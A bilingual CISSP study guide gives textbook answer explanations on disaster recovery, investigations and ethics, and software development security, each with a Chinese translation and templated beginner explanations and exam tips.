现场办公室是合理的 选择,但它位于特定位置,灵活性不如基于云的方案。 IT经理的家中是较差 的选择,因为IT经理可能离开组织,或其住所缺乏适当环境与物理安全控制。 6. A、B、D。 此处唯一错误的陈述是业务连续性规划在灾难恢复规划结束后 接续工作。 事实上,情况正好相反:灾难恢复规划是在业务连续性规划结束 后接续工作的。 其他三项陈述均准确反映了业务连续性规划与灾难恢复规划 的作用。 业务连续性规划的重点是在灾难发生时保持业务功能不间断。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1536 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

RTO 是多久恢复,RPO 是能丢多少数据。

RTO 问时间:多久必须恢复。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 143 / PDF P1537

第 1537 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Organizations can choose whether to develop business continuity planning or disaster recovery planning plans. Disaster recovery planning guides an organization through recovery of normal operations at the primary facility. 7. B. The term 100-year floodplain is used to describe an area where flooding is expected once every 100 years. It is, however, more mathematically correct to say that this label indicates a 1 percent probability of flooding in any given year. 8. D. When you use remote mirroring, an exact copy of the database is maintained at an alternative location. You keep the remote copy up-todate by executing all transactions on both the primary and remote sites at the same time.

Electronic vaulting follows a similar process of storing all data at the remote location, but it does not do so in real time. Transaction logging and remote journaling options send logs, rather than full data replicas, to the remote location. 9. C. All of these are good practices that could help improve the quality of service that Bryn provides from her website. Installing dual power supplies or deploying RAID arrays could reduce the likelihood of a server failure, but these measures only protect against a single risk each. Deploying multiple servers behind a load balancer is the best option because it protects against any type of risk that would cause a server failure.

Backups are an important control for recovering operations after a disaster, and different backup strategies could indeed alter the RTO, but it is even better if Bryn can design a web architecture that lowers the risk of the outage occurring in the first place. 10. B. During the business impact analysis phase, you must identify the business priorities of your organization to assist with the allocation of BCP resources. You can use this same information to drive the DRP business unit prioritization. 11. C. The cold site contains none of the equipment necessary to restore operations.

All of the equipment must be brought in and configured and data must be restored to it before operations can commence. This often takes weeks, but cold sites also have the lowest cost to implement. Hot sites, warm sites, and mobile sites all have quicker recovery times. 12. C. Uninterruptible power supplies (UPS) provide a battery-backed source of power that is capable of preserving operations in the event of brief power outages. Generators take a significant amount of time to start and

中文直译 / 整理

组织可以选择是否制定业务连续性计划或灾难恢复计划。 灾难恢复计划指 导组织在主设施中恢复正常运营。 7. B. 术语 百年一遇洪水区 用于描述预计每100年发生一次洪水的区 域。 然而,更符合数学严谨性的说法是,该标签表示任何一年内发生 洪水的概率为1%。 8. D. 使用远程镜像时,会在备用位置维护数据库的精确副本。 您通过在主站 点和远程站点同时执行所有事务来保持远程副本的最新状态。 电子 Vaulting 遵循类似的流程,将所有数据存储在远程位置,但并非实时进行。 事务日志和远程日记选项则向远程位置发送日志,而非完整的数据副本。 9. C. 所有这些做法都有助于改善 Bryn 从其网站提供的服务质量。 安装双电 源或部署 RAID 阵列可以降低服务器故障的可能性,但这些措施各自仅能防 范单一风险。 在负载均衡器后部署多台服务器是最佳选择,因为它能防范导 致服务器故障的任何类型风险。 备份对于灾难后的运营恢复至关重要,不同 的备份策略确实可能影响 RTO,但如果 Bryn 能设计一种降低中断发生风险 的 Web 架构,则更为理想。 10. B. 在业务影响分析阶段,您必须确定组织的业务优先级,以协助分配 BCP资源。

您可以使用相同的信息来推动DRP的业务单元优先级排序。 11. C. 冷站点不包含恢复运营所需的任何设备。 所有设备都必须运抵并进行 配置,数据也必须恢复到该站点后,运营才能开始。 这通常需要数周时间, 但冷站点的实施成本最低。 热站点、温站点和移动站点的恢复时间都更短。 12. C. 不间断电源(UPS)提供由电池供电的电源,在短暂停电时能够维持运 营。 发电机启动需要较长时间,

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

恢复时间目标 RTO:RTO 是业务或系统最多能中断多久。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1537 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

RTO 问时间:多久必须恢复。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
学习单元 144 / PDF P1538

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

are more suitable for longer-term outages. Dual-power supplies protect against power supply failures and not power outages. Redundant network links are a network continuity control and do not provide power. 13. D. Warm sites and hot sites both contain workstations, servers, and the communications circuits necessary to achieve operational status. The main difference between the two alternatives is the fact that hot sites contain near-real-time copies of the operational data, and warm sites require the restoration of data from backup. 14. D. The parallel test involves relocating personnel to the alternate recovery site and implementing site activation procedures.

Readthroughs, walk-throughs, and simulations are all test types that do not involve actually activating the alternate site. 15. A. The executive summary provides a high-level view of the entire organization's disaster recovery efforts. This document is useful for the managers and leaders of the firm as well as public relations personnel who need a nontechnical perspective on this complex effort. 16. D. Software escrow agreements place the application source code in the hands of an independent third party, thus providing firms with a “safety net” in the event a developer goes out of business or fails to honor the terms of a service agreement. 17. A.

Differential backups involve always storing copies of all files modified since the most recent full backup regardless of any incremental or differential backups created during the intervening time period. 18. B. People should always be your highest priority in business continuity planning. As a life safety system, fire suppression systems should always receive high prioritization. 19. A. Any backup strategy must include full backups at some point in the process. If a combination of full and differential backups is used, a maximum of two backups must be restored. If a combination of full and incremental backups is chosen, the number of required restorations may be large. 20. B.

Parallel tests involve moving personnel to the recovery site and gearing up operations, but responsibility for conducting day-to-day operations of the business remains at the primary operations center.

中文直译 / 整理

更适合长期中断。 双电源可防止电源故障,但不能防止停电。 冗余网络链 路是网络连续性控制,不提供电力。 13. D. 温站点和热站点均包含实现运行状态所需的工作站、服务器和通信电 路。 这两种方案的主要区别在于,热站点包含接近实时的运行数据副本,而 温站点则需要从备份中恢复数据。 14. D. 并行测试涉及将人员 relocating 到备用恢复站点并实施站点激活程序。 读‑ 通过、演练和模拟都是不涉及实际激活备用站点的测试类型。 15. A. 执行摘要提供了整个组织灾难恢复工作的高层视角。 该文件对公司的 管理者和领导者以及需要从非技术角度了解这一复杂工作的公关人员非常有 用。 16. D. 软件托管协议将应用程序源代码交由独立的第三方保管,从而在开发 人员倒闭或未能履行服务协议条款时,为企业提供一道“安全网”。 17. A. 差异备份始终存储自最近一次完整备份以来所有已修改的文件副本, 无论在此期间创建了任何增量备份或差异备份。 18. B. 在业务连续性规划中,人员应始终是最高优先级。 作为生命安全系统, 消防系统应始终获得高度优先考虑。 19. A. 任何备份策略都必须在某个阶段包含完整备份。

如果采用完整备份与差 异备份的组合,则最多需要恢复两个备份; 如果选择完整备份与增量备份的 组合,则所需恢复的次数可能较多。 20. B. 并行测试涉及将人员转移到恢复站点并启动运营,但日常业务运营 的责任仍留在主要运营中心。

小白解释

场景先行:你是公司的安全负责人,正在读第 1538 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 145 / PDF P1539

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

Chapter 19: Investigations and Ethics 1. C. A crime is any violation of a law or regulation. The violation stipulation defines the action as a crime. It is a computer crime if the violation involves a computer either as the target or as a tool. Computer crimes may not be defined in an organization's policy, as crimes are only designed in law. Illegal attacks are indeed crimes, but this is too narrow of a definition. The failure to practice due diligence may be a liability but, in most cases, is not a criminal action. 2. B. A military and intelligence attack is targeted at the classified data that resides on the system.

To the attacker, the value of the information justifies the risk associated with such an attack. The information extracted from this type of attack is often used to plan subsequent attacks. 3. A. The code of ethics does not require that you protect your colleagues. 4. B. A financial attack focuses primarily on obtaining services and funds illegally. Accessing services that you have not purchased is an example of obtaining services illegally. Transferring funds from an unapproved source is obtaining funds illegally, as is leasing out a botnet for use in DDoS attacks. Disclosing confidential information is not necessarily financially motivated. 5. B.

A terrorist attack is launched to interfere with a way of life by creating an atmosphere of fear. A computer terrorist attack can reach this goal by reducing the ability to respond to a simultaneous physical attack. While terrorists may engage in other actions, such as altering information, stealing data, or transferring funds, as part of their attacks, these items alone are not indicators of terrorist activity. 6. D. Any action that can harm a person or organization, either directly or through embarrassment, would be a valid goal of a grudge attack. The purpose of such an attack is to “get back” at someone. 7. A, C.

Thrill attacks have no reward other than providing a boost to pride and ego. The thrill of launching the attack comes from the act of participating in the attack (and not getting caught). 8. C. Although the other options have some merit in individual cases, the most important rule is to never modify, or taint, evidence. If you modify evidence, it becomes inadmissible in court.

中文直译 / 整理

第19章:调查与伦理 1. C。 犯罪是指任何违反法律或法规的行为。 违规条款将该行为定义为犯罪。 如果违规行为涉及计算机作为目标或工具,则属于计算机犯罪。 组织的政策 中可能未定义计算机犯罪,因为犯罪仅由法律界定。 非法攻击确实是犯罪, 但这一定义过于狭窄。 未能尽到应有的注意义务可能构成责任,但在大多数 情况下并不构成刑事行为。 2. B。 军事和情报攻击针对的是系统中存储的机密数据。 对攻击者而言,信 息的价值足以证明此类攻击所伴随的风险是合理的。 从这种攻击中提取的信 息通常用于策划后续攻击。 3. A。 道德准则并不要求你保护你的同事。 4. B。 金融攻击主要侧重于非法获取服务和资金。 访问你未购买的服务是非 法获取服务的例子; 从未经批准的来源转移资金是非法获取资金,通过出租 僵尸网络用于DDoS攻击也是如此。 泄露机密信息并不一定具有经济动机。 5. B. 恐怖袭击旨在通过制造恐惧氛围来干扰一种生活方式。 计算机恐怖袭击 可以通过降低对同时发生的物理袭击的应对能力来实现这一目标。 尽管恐怖 分子可能在袭击中采取其他行动,例如篡改信息、窃取数据或转移资金,但 这些行为本身并不能作为恐怖活动的指标。

6. D. 任何可能直接或通过羞辱伤害个人或组织的行为,都可能是怨恨攻击 的合法目标。 此类攻击的目的是“报复”某人。 7. A、C. 刺激性攻击除了提升自豪感和自我满足感外,没有任何其他回报。 发动攻击的刺激感源于参与攻击(且未被抓获)的行为本身。 8. C. 尽管其他选项在个别情况下有一定道理,但最重要的原则是绝不能修 改或污染证据。 如果你修改了证据,它将在法庭上失去效力。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

政策:政策是高层原则,说明必须遵守什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 146 / PDF P1540

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

9. D. The most compelling reason for not removing power from a machine is that you will lose the contents of memory. Carefully consider the pros and cons of removing power. After all is considered, it may be the best choice. 10. C. Written documents brought into court to prove the facts of a case are referred to as documentary evidence. The best evidence rule states that when a document is used as evidence in a court proceeding, the original document must be introduced.

The parol evidence rule states that when an agreement between parties is put into written form, the written document is assumed to contain all the terms of the agreement and no verbal agreements may modify the written agreement. Testimonial evidence is evidence consisting of the testimony of a witness, either verbal testimony in court or written testimony in a recorded deposition. 11. C. Criminal investigations may result in the imprisonment of individuals and, therefore, have the highest standard of evidence to protect the rights of the accused. 12. B. Root cause analysis seeks to identify the reason that an operational issue occurred.

The root cause analysis often highlights issues that require remediation to prevent similar incidents in the future. Forensic analysis is used to obtain evidence from digital systems. Network traffic analysis is an example of a forensic analysis category. Fagan inspection is a software testing technique. 13. A. Preservation ensures that potentially discoverable information is protected against alteration or deletion. Production places the information into a format that may be shared with others and delivers it to other parties, such as opposing counsel.

Processing screens the collected information to perform a “rough cut” of irrelevant information, reducing the amount of information requiring detailed screening. Presentation displays the information to witnesses, the court, and other parties. 14. B. Server logs are an example of documentary evidence. Gary may ask that they be introduced in court and will then be asked to offer testimonial evidence about how he collected and preserved the evidence. This testimonial evidence authenticates the documentary evidence. 15. B. In this case, you need a search warrant to confiscate equipment without giving the suspect time to destroy evidence. If the suspect 9. D.

中文直译 / 整理

不关闭机器电源的最有力原因是,您将丢失内存中的内容。 请仔细权 衡断电的利弊。 综合考虑后,这可能是最佳选择。 10. C. 在法庭上用于证明案件事实的书面文件被称为书证。 最佳证据规则规 定,当文件作为法庭程序中的证据使用时,必须提交原始文件。 口头证据规 则规定,当双方协议以书面形式确定时,该书面文件被视为包含协议的所有 条款,任何口头协议均不得修改书面协议。 证人证言是证人提供的证据,包 括法庭上的口头证词或记录的书面证词。 11. C. 刑事调查可能导致个人被监禁,因此需要最高的证据标准,以保护被告 的权利。 12. B. 根本原因分析旨在查明运营问题发生的原因。 根本原因分析通常会突出 需要纠正的问题,以防止未来发生类似事件。 取证分析用于从数字系统中获取 证据。 网络流量分析是取证分析的一个类别。 法根检查是一种软件测试技术。 13. A. 保全确保潜在可发现的信息免受篡改或删除。 提供阶段将信息转换为 可与他人共享的格式,并将其交付给其他方,例如对方律师。 处理阶段对收 集的信息进行筛选,以剔除无关信息的粗略部分,减少需要详细审查的信息 量。 展示阶段向证人、法庭和其他方呈现信息。

14. B. 服务器日志是文件证据的一个例子。 加里可以要求将其引入法庭,随 后将被要求就其如何收集和保全证据提供证言证据。 该证言证据用于认证文 件证据。 15. B. 在本案例中,您需要搜查令才能在不给嫌疑人销毁证据时间的情况 下没收设备。 如果嫌疑人

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 147 / PDF P1541

第 1541 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

worked for your organization and you had all employees sign consent agreements, you could simply confiscate the equipment. 16. A. Log files contain a large volume of generally useless information. However, when you are trying to track down a problem or an incident, they can be invaluable. Even if an incident is discovered as it is happening, it may have been preceded by other incidents. Log files provide valuable clues and should be protected and archived, often by forwarding log entries to a centralized log management system. 17. D.

Review examines the information resulting from the Processing phase to determine what information is responsive to the request and remove any information protected by attorney-client privilege. Identification locates the information that may be responsive to a discovery request when the organization believes that litigation is likely. Collection gathers the relevant information centrally for use in the eDiscovery process. Processing screens the collected information to perform a “rough cut” of irrelevant information, reducing the amount of information requiring detailed screening. 18. D. Ethics are simply rules of personal behavior.

Many professional organizations establish formal codes of ethics to govern their members, but ethics are personal rules individuals use to guide their lives. 19. B. The second canon of the ISC2 Code of Ethics states how a CISSP should act, which is honorably, honestly, justly, responsibly, and legally. 20. B. RFC 1087 does not specifically address the statements in A, C, or D. Although each type of activity listed is unacceptable, only “actions that compromise the privacy of users” are explicitly identified in RFC 1087.

中文直译 / 整理

如果员工曾为您的组织工作,且您已让所有员工签署同意协议,您就可以 直接没收设备。 16. A. 日志文件包含大量通常无用的信息。 然而,当您试图追踪问题或事 件时,它们可能极为宝贵。 即使事件在发生时被发现,也可能之前已发生 过其他事件。 日志文件提供了宝贵的线索,应加以保护和归档,通常通过 将日志条目转发到集中式日志管理系统来实现。 17. D. 审查阶段检查处理阶段产生的信息,以确定哪些信息对请求具有响应性, 并移除受律师‑客户特权保护的信息。 识别阶段在组织认为诉讼可能性较大时, 定位可能对取证请求具有响应性的信息。 收集阶段将相关信息集中起来,用于 电子取证过程。 处理阶段对收集的信息进行筛选,执行一次“粗略筛选”以剔 除无关信息,减少需要详细审查的信息量。 18. D. 伦理仅仅是个人行为的准则。 许多专业组织制定了正式的伦理规范来 约束其成员,但伦理是个人用来指导自身行为的准则。 19. B. ISC2 道德准则的第二条规范了 CISSP 应如何行事,即应正直、诚实、公 正、负责任且合法。 20. B. RFC 1087 并未明确涉及 A、C 或 D 中的陈述。

尽管所列的每种行为 均不可接受,但 RFC 1087 中仅明确指出了“损害用户隐私的行为”。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

职业伦理:职业伦理要求安全人员保护公众、诚实负责、合法合规。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1541 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 148 / PDF P1542

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Chapter 20: Software Development Security 1. A. The three elements of the DevOps model are software development, quality assurance, and IT operations. Information security is only introduced in the DevSecOps model. 2. B. Input validation ensures that the input provided by users matches the design parameters. Polyinstantiation includes additional records in a database for presentation to users with differing security levels as a defense against inference attacks. Contamination is the mixing of data from a higher classification level and/or need-to-know requirement with data from a lower classification level and/or need-to-know requirement.

Screening is a generic term and does not represent any specific security technique in this context. 3. C. Request control provides users with a framework to request changes and developers with the opportunity to prioritize those requests. Configuration control ensures that changes to software versions are made in accordance with the change and configuration management policies. Request control provides an organized framework for users to request modifications. Change auditing is used to ensure that the production environment is consistent with the change accounting records. 4. C. In a fail-secure state, the system remains in a high level of security until an administrator intervenes.

In a fail-open state, the system defaults to a low level of security, disabling controls until the failure is resolved. Failure mitigation seeks to reduce the impact of a failure. Failclear is not a valid approach. 5. B. The iterative waterfall model uses a seven-stage approach to software development and includes a feedback loop that allows development to return to the previous phase to correct defects discovered during the subsequent phase. 6. B. The activities of threat assessment, threat modeling, and security requirements are all part of the Design function under SAMM. 7. C.

Foreign keys are used to enforce referential integrity constraints between tables that participate in a relationship. Candidate keys are sets of fields that may potentially serve as the primary key, the key used to

中文直译 / 整理

第20章:软件开发安全 1. A. DevOps 模型的三个要素是软件开发、质量保证和 IT 运营。 信息安 全仅在 DevSecOps 模型中引入。 2. B. 输入验证确保用户提供的输入符合设计参数。 多实例化通过在数据库中 为具有不同安全级别的用户添加额外记录,以防御推断攻击。 污染是指将较 高密级和/或知悉需求的数据与较低密级和/或知悉需求的数据混合。 筛选是 一个通用术语,在此上下文中不代表任何特定的安全技术。 3. C. 请求控制为用户提供请求变更的框架,并为开发人员提供优先处理这 些请求的机会。 配置控制确保软件版本的更改符合变更和配置管理策略。 请求控制为用户请求修改提供了有组织的框架。 变更审计用于确保生产环 境与变更会计记录保持一致。 4. C. 在故障安全状态下,系统将保持在高水平的安全状态,直到管理员介 入。 在故障开放状态下,系统默认降级为低安全级别,禁用控制措施,直到 故障被解决。 故障缓解旨在降低故障的影响。 故障清除不是一种有效的方法。 5. B. 迭代瀑布模型采用七阶段方法进行软件开发,并包含一个反馈循环, 允许开发返回到前一阶段以修正在后续阶段发现的缺陷。

6. B. 威胁评估、威胁建模和安全需求的活动都是SAMM中设计功能的一部 分。 7. C. 外键用于在具有关系的表之间强制引用完整性约束。 候选键是一组可 能作为主键的字段,即用于

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

越早做威胁建模,修复成本越低。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
审计 审计检查控制是否存在、是否有效、是否符合要求。
开发安全运营一体化 DevSecOps 把安全自动化嵌入开发和交付流程。
学习单元 149 / PDF P1543

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

uniquely identify database records. Alternate keys are candidate keys that are not selected as the primary key. 8. D. In this case, the process the database user is taking advantage of is aggregation. Aggregation attacks involve the use of specialized database functions to combine information from a large number of database records to reveal information that may be more sensitive than the information in individual records would reveal. Inference attacks use deductive reasoning to reach conclusions from existing data.

Contamination is the mixing of data from a higher classification level and/or need-to-know requirement with data from a lower classification level and/or need-to-know requirement. Polyinstantiation is the creation of different database records for users of differing security levels. 9. C. Polyinstantiation allows the insertion of multiple records that appear to have the same primary key values into a database at different classification levels. Aggregation attacks involve the use of specialized database functions to combine information from a large number of database records to reveal information that may be more sensitive than the information in individual records would reveal.

Inference attacks use deductive reasoning to reach conclusions from existing data. Manipulation is the authorized or unauthorized alteration of data in a database. 10. D. In Agile, the highest priority is to satisfy the customer through early and continuous delivery of valuable software. It is not to prioritize security over other requirements. The Agile principles also include satisfying the customer through early and continuous delivery, businesspeople and developers working together, and paying continuous attention to technical excellence. 11. C.

Expert systems use a knowledge base consisting of a series of “if/then” statements to form decisions based on the previous experience of human experts. 12. D. In the Managed phase, level 4 of the SW-CMM, the organization uses quantitative measures to gain a detailed understanding of the development process. 13. B. ODBC acts as a proxy between applications and the backend DBMS. The software development life cycle (SDLC) is a model for the software development process that incorporates all necessary activities. The Payment Card Industry Data Security Standard (PCI DSS) is a regulatory

中文直译 / 整理

